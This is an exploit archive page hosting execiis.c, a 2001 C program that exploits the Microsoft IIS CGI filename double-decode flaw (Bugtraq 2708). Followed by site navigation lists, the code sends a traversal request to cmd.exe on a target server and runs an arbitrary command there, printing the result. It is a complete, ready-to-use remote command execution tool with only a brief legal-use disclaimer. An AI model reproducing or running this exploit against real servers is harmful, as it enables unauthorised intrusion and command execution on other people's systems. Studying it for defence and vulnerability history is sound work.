execiis.c

execiis.c: Posted May 17, 2001; Authored by Filip Maertens | Site vorlon.hexyn.be; Execiis.c is a remote exploit for Bugtraq ID 2708 - Microsoft IIS CGI filename decode error.; tags | exploit, remote, cgi; SHA-256 | 930daed1380743902694409c2275d36ed101487eb3dbd8df8b795068aba598ba; Download | Favorite | View

execiis.c

/*
 *
 * execiis.c - (c)copyright Filip Maertens
 * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
 *
 * DISCLAIMER:    This  is  proof of concept code.  This means, this
code
 * may only be used on approved systems in order to test the
availability
 * and integrity of machines  during a legal penetration test.  In no
way
 * is the  author of  this exploit  responsible for the use and result
of
 * this code.
 *
 * I no way does the author of this  proof of concept  code claim
credits
 * for the advisory being discussed.  This is simply an easy-to-use,
out-
 * of-the-box, quick'n'dirty piece of code.  Use it, test it...
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>


/* Modify this value to whichever sequence you want.
 *
 * %255c = %%35c = %%35%63 = %25%35%63 = /
 *
 */

#define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"



int main(int argc, char *argv[])
{

 struct sockaddr_in sin;
 char recvbuffer[1], stuff[200];
 int create_socket;

 printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |
<filip@securax.be>\n-------------------------------------------------------------------------\n");

 if (argc < 3)
 {
  printf(" -- Usage: iisexec [ip] [command]\n");
  exit(0);
 }


if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
 printf(" -- Socket created.\n");

 sin.sin_family = AF_INET;
 sin.sin_port = htons(80);
 sin.sin_addr.s_addr = inet_addr(argv[1]);

if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
 printf(" -- Connection made.\n");
else
 { printf(" -- No connection.\n"); exit(1); }


 strcat(stuff, "GET ");
 strcat(stuff, SHOWSEQUENCE);
 strcat(stuff, argv[2]);
 strcat(stuff, " HTTP/1.0\n\n");

 memset(recvbuffer, '\0',sizeof(recvbuffer));

 send(create_socket, stuff, sizeof(stuff), 0);
 recv(create_socket, recvbuffer, sizeof (recvbuffer),0);


  if ( ( strstr(recvbuffer,"404") == NULL ) ) {
         while(recv(create_socket, recvbuffer, 1, 0) > 0)
                 {
                  printf("%c", recvbuffer[0]);
                 }
   } else {
     printf(" -- Wrong command processing. \n");
   }

 close(create_socket);

}

// EOF - More exploits @ http://vorlon.hexyn.be

Top Authors In Last 30 Days

Red Hat 287 files
Ubuntu 61 files
Gentoo 32 files
Debian 24 files
Apple 9 files
malvuln 6 files
Google Security Research 5 files
nu11secur1ty 5 files
Jann Horn 5 files
h00die 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,646)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,788)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,508)
UNIX (9,402)
UnixWare (187)
Windows (6,660)
Other

execiis.c

execiis.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

execiis.c

Share This

execiis.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems